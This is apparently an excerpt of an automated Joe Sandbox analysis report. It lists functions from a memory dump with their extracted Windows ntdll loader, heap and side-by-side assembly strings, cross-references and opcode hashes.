                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                  • API String ID: 0-108210295
                                                                  • Opcode ID: 355deb901f7c9f4c8e3dcacd87d999466f7ceb4342ed3583a7bab30f0a4ac956
                                                                  • Instruction ID: 517ebd75f2b8bfa115721ac0f1bf59cc476374e74b0344611b3a8a1cd526a808
                                                                  • Opcode Fuzzy Hash: 355deb901f7c9f4c8e3dcacd87d999466f7ceb4342ed3583a7bab30f0a4ac956
                                                                  • Instruction Fuzzy Hash: 0C81F279A04124BFDB228B14CC85DAB3B76EF66754F010548F91C6F236E3328697DA63
                                                                  Function 2CE08620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • corrupted critical section, xrefs: 2CE454C2
                                                                  • undeleted critical section in freed memory, xrefs: 2CE4542B
                                                                  • 8, xrefs: 2CE452E3
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE454CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE4540A, 2CE45496, 2CE45519
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2CE454E2
                                                                  • Critical section debug info address, xrefs: 2CE4541F, 2CE4552E
                                                                  • Address of the debug info found in the active list., xrefs: 2CE454AE, 2CE454FA
                                                                  • Critical section address, xrefs: 2CE45425, 2CE454BC, 2CE45534
                                                                  • Critical section address., xrefs: 2CE45502
                                                                  • double initialized or corrupted critical section, xrefs: 2CE45508
                                                                  • Invalid debug info address of this critical section, xrefs: 2CE454B6
                                                                  • Thread identifier, xrefs: 2CE4553A
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 2CE45543
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: c1c1e9db4cd3cd6f3db3ac8e376900019f186df8475ea226cdd025efe242b86e
                                                                  • Instruction ID: 219390c7323bc4caf7b01720895f864a62e208eb86d95a980959c6defdc5fa73
                                                                  • Opcode Fuzzy Hash: c1c1e9db4cd3cd6f3db3ac8e376900019f186df8475ea226cdd025efe242b86e
                                                                  • Instruction Fuzzy Hash: 3A816BB1E01258EFEB20CF95DC80FAEBBB5BF09714F204119E505B7250D375AA49CBA0
                                                                  Function 2CE029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 2CE422E4
                                                                  • @, xrefs: 2CE4259B
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 2CE42602
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 2CE42624
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 2CE424C0
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2CE425EB
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 2CE42409
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2CE42506
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 2CE4261F
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 2CE42498
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 2CE42412
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 85b111ea0255f1ef77634703c3c896ea7f0c83d1a4049ef93bd36b64384f4058
                                                                  • Instruction ID: 22a93ba3cd6523be59fbbb9aa0e83270255056d2f684bd25c3219b8d8c076f90
                                                                  • Opcode Fuzzy Hash: 85b111ea0255f1ef77634703c3c896ea7f0c83d1a4049ef93bd36b64384f4058
                                                                  • Instruction Fuzzy Hash: 49024EF1D052299BDB21CB14CD80BD9B7B8AB55304F0141DAE609B7241DB319FC8CFA9
                                                                  Function 2CE78B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: da6db74277e7de13c281d9aa4cd35704e829574715016ae8d04f4b583a0d0e11
                                                                  • Instruction ID: 5dd6eb692faa383633b4ca140dc1923b55b8819bf07ff1e5b4f3c31a4d62127f
                                                                  • Opcode Fuzzy Hash: da6db74277e7de13c281d9aa4cd35704e829574715016ae8d04f4b583a0d0e11
                                                                  • Instruction Fuzzy Hash: BA51B2715093119BC339CF188980BABBBFCFFA4644F114A1DEA69D3251E770D649C792
                                                                  Function 2CDEAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                  • API String ID: 0-3197712848
                                                                  • Opcode ID: 876a431e0b5f5a595c34b23b5d910e670935fd4ade284cf13c44253e17e30abf
                                                                  • Instruction ID: 9c269446e654bfbea97a6fe4973c05269b794063d5121ba218876e11220c6b60
                                                                  • Opcode Fuzzy Hash: 876a431e0b5f5a595c34b23b5d910e670935fd4ade284cf13c44253e17e30abf
                                                                  • Instruction Fuzzy Hash: CD12E3716093529BD320CF14C480BAAB7E4BF85704F04066EF9DD9B2A1E734EA45CBA6
                                                                  Function 2CE80CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                  • API String ID: 0-1357697941
                                                                  • Opcode ID: 6b24b9a02420549afff5b9f41f34533bac29f668faebf3c87e49ba55a1eea3f3
                                                                  • Instruction ID: 30670625ac03bf944ae4219533b47fa7b7a07625883104af69c1f3ad229d28f2
                                                                  • Opcode Fuzzy Hash: 6b24b9a02420549afff5b9f41f34533bac29f668faebf3c87e49ba55a1eea3f3
                                                                  • Instruction Fuzzy Hash: BFF11431605646EFDB11CF64C480BEAB7F5FF09314F10825DE5899B262D734AA89CBA0
                                                                  Function 2CE02F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 2CE429B1
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2CE4292E
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2CE428B2
                                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 2CE42856
                                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 2CE429AC
                                                                  • @, xrefs: 2CE03180
                                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 2CE42881
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                  • API String ID: 0-541586583
                                                                  • Opcode ID: 868ec11590cbd05cbd8e03746c888116b31f6d6e26767439fc887619f6453999
                                                                  • Instruction ID: a2310937debcd31bb7e778279971ef1741f2a24d09631b11bb4011cdf370e588
                                                                  • Opcode Fuzzy Hash: 868ec11590cbd05cbd8e03746c888116b31f6d6e26767439fc887619f6453999
                                                                  • Instruction Fuzzy Hash: 08C1EF71D05229ABDB318F15DC84BAAB3B4EF99704F1040E9E94CBB250E7748E85CFA1
                                                                  Function 2CE589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • VerifierFlags, xrefs: 2CE58C50
                                                                  • VerifierDebug, xrefs: 2CE58CA5
                                                                  • HandleTraces, xrefs: 2CE58C8F
                                                                  • VerifierDlls, xrefs: 2CE58CBD
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 2CE58A67
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 2CE58B8F
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 2CE58A3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 074872e8d955a5a2a311f2081371ffb391bd00b74d73c7360f9a48870217348c
                                                                  • Instruction ID: 75cef2bfb8719e0f7c75eb44dba1c2347b4b6b6946b549bcfc3c31a651c03049
                                                                  • Opcode Fuzzy Hash: 074872e8d955a5a2a311f2081371ffb391bd00b74d73c7360f9a48870217348c
                                                                  • Instruction Fuzzy Hash: 32910472686715EFD321CF288880F9A77F8AFA4794F01096CF9616B251D7309E49C792
                                                                  Function 2CE54DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 2CE54E38
                                                                  • Execute '.cxr %p' to dump context, xrefs: 2CE54EB1
                                                                  • ***Exception thrown within loader***, xrefs: 2CE54E27
                                                                  • LdrpGenericExceptionFilter, xrefs: 2CE54DFC
                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 2CE54DF5
                                                                  • LdrpProtectedCopyMemory, xrefs: 2CE54DF4
                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 2CE54E06
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                  • API String ID: 0-2973941816
                                                                  • Opcode ID: e69154b99a01ae42bc29052e4314fe20a7de81af9372179118f6476da452b8d4
                                                                  • Instruction ID: dba1560e31bbd4d875ab092cf79c71157cb0635517cd4f6ad091327cd394ef8a
                                                                  • Opcode Fuzzy Hash: e69154b99a01ae42bc29052e4314fe20a7de81af9372179118f6476da452b8d4
                                                                  • Instruction Fuzzy Hash: 082126723091117BE7048B6C8CC5EAA77D8EF425E8F208109F112BE5A4CD60EE56C661
                                                                  Function 2CDDEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                  • API String ID: 0-1109411897
                                                                  • Opcode ID: 64afe1bbe3060424c23140a385e752783ff70addbc161e67e445afa040bf96d3
                                                                  • Instruction ID: 034322a224a67cf6398b22fd71c739b5a07298d30d1bf0e3e6a4dc0cfd517365
                                                                  • Opcode Fuzzy Hash: 64afe1bbe3060424c23140a385e752783ff70addbc161e67e445afa040bf96d3
                                                                  • Instruction Fuzzy Hash: 27A24D72E0566A8FDB64CF25CC88BA9BBB5AF45304F1142EDD54CA7260DB359E85CF00
                                                                  Function 2CDDADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                  • API String ID: 0-4098886588
                                                                  • Opcode ID: ef1dff327a6523089d30c7ebfd1d42cbeded4433aff9f8d21e887dcce85aa1df
                                                                  • Instruction ID: f42f76a6693ff1e4df677eec9e1a8712625589b82fcace84408ecb0bb461462d
                                                                  • Opcode Fuzzy Hash: ef1dff327a6523089d30c7ebfd1d42cbeded4433aff9f8d21e887dcce85aa1df
                                                                  • Instruction Fuzzy Hash: D332BE73E4526A9BDB21CF14C884BEEB7B9AF45348F1141EAE848A7261D7319F81CF50
                                                                  Function 2CE02CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • \WinSxS\, xrefs: 2CE02E23
                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 2CE42706
                                                                  • .Local\, xrefs: 2CE02D91
                                                                  • @, xrefs: 2CE02E4D
                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2CE4279C
                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2CE4276F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                  • API String ID: 0-3926108909
                                                                  • Opcode ID: a5d675f95927ddd364d7b2ab00d2d3e8b938a11ad9a3a3b22e7c4d6b69398f83
                                                                  • Instruction ID: 965d8b9273d50ded569d044aa30a573e6fa46e6d05da63b002b009f6d4d2be4f
                                                                  • Opcode Fuzzy Hash: a5d675f95927ddd364d7b2ab00d2d3e8b938a11ad9a3a3b22e7c4d6b69398f83
                                                                  • Instruction Fuzzy Hash: 8A81DD71509342DFD712CF15C890AABB7E8EF95704F00899DF894EB251D371D948CBA2
                                                                  Function 2CDC645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 2CE29A01
                                                                  • apphelp.dll, xrefs: 2CDC6496
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 2CE29A2A
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 2CE299ED
                                                                  • LdrpInitShimEngine, xrefs: 2CE299F4, 2CE29A07, 2CE29A30
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE29A11, 2CE29A3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-204845295
                                                                  • Opcode ID: 59357915649703a1dcf075328177bc244bd606667211f7ade393392edb59961e
                                                                  • Instruction ID: 9beb0b742761dd8f6d7b73c7da4ebb6581b3264323f6a25758ede5b2b1dcb46b
                                                                  • Opcode Fuzzy Hash: 59357915649703a1dcf075328177bc244bd606667211f7ade393392edb59961e
                                                                  • Instruction Fuzzy Hash: 7B51A2722187049FE311DF24C881F9B77E8FB94654F10092DF59AA7160DB30EA4ACB93
                                                                  Function 2CE0C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializeProcess, xrefs: 2CE0C6C4
                                                                  • Loading import redirection DLL: '%wZ', xrefs: 2CE48170
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 2CE48181, 2CE481F5
                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 2CE481E5
                                                                  • LdrpInitializeImportRedirection, xrefs: 2CE48177, 2CE481EB
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE0C6C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-475462383
                                                                  • Opcode ID: 1a0cfa6e367ab280d6a70cf48fa2a4e3ded319ec04bbe51f5a4e202649d2b34e
                                                                  • Instruction ID: 0e967768dfaf3f16ca0eb54d05d9a073fce74cb865431e4ded16a5565f295b37
                                                                  • Opcode Fuzzy Hash: 1a0cfa6e367ab280d6a70cf48fa2a4e3ded319ec04bbe51f5a4e202649d2b34e
                                                                  • Instruction Fuzzy Hash: D0313772A047419FC220DF28ED85E5BB7E4EF90B14F01055CF885BB2A1D620ED49C7E2
                                                                  Function 2CE02674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlGetAssemblyStorageRoot, xrefs: 2CE42160, 2CE4219A, 2CE421BA
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 2CE421BF
                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2CE4219F
                                                                  • SXS: %s() passed the empty activation context, xrefs: 2CE42165
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 2CE42178
                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 2CE42180
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                  • API String ID: 0-861424205
                                                                  • Opcode ID: 43ab8e910c6772441d6e1a40bd4be6ab9bcca70445fc71d52788df5e700150b4
                                                                  • Instruction ID: dc443a079f89f2c56bac0f153df76b6ce0b4fcd0f04d7f7325c0734a43732da0
                                                                  • Opcode Fuzzy Hash: 43ab8e910c6772441d6e1a40bd4be6ab9bcca70445fc71d52788df5e700150b4
                                                                  • Instruction Fuzzy Hash: E3314937E01224B7F7228A95DC80FAF7BB8DFA5684F054059FA05B7254D2709E46C7E2
                                                                  Function 2CE1096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 2CE12DF0: LdrInitializeThunk.NTDLL ref: 2CE12DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2CE10D74
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  • Opcode ID: ff7618000d89cfbb6f142bfd4f468151d32e99e42cf6fcfee04adf18656e6500
                                                                  • Instruction ID: d84d2fd1f359fb148eb9d2ad6c98013902bb48a40c489e4415d2820415279d08
                                                                  • Opcode Fuzzy Hash: ff7618000d89cfbb6f142bfd4f468151d32e99e42cf6fcfee04adf18656e6500
                                                                  • Instruction Fuzzy Hash: E3425B71900715DFDB21CF24C880BDAB7F9BF58304F1485AAE999EB241D770AA94CFA1
                                                                  Function 2CE54F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                  • API String ID: 0-2518169356
                                                                  • Opcode ID: 3772efd9d96248cc3cd84e99237376d9c2e0b813378d28c31011845279e8612a
                                                                  • Instruction ID: 6b7f485269feace10f0bdc5a9e2307f63ffa5e461348357bfef20e6dc564063c
                                                                  • Opcode Fuzzy Hash: 3772efd9d96248cc3cd84e99237376d9c2e0b813378d28c31011845279e8612a
                                                                  • Instruction Fuzzy Hash: 4191E072A02619CBCB11CFADC881AAEB7F0EF49354F654169E815E7350E735DA41CB90
                                                                  Function 2CE08402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpInitializeProcess, xrefs: 2CE08422
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2CE0855E
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 2CE08421
                                                                  • @, xrefs: 2CE08591
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
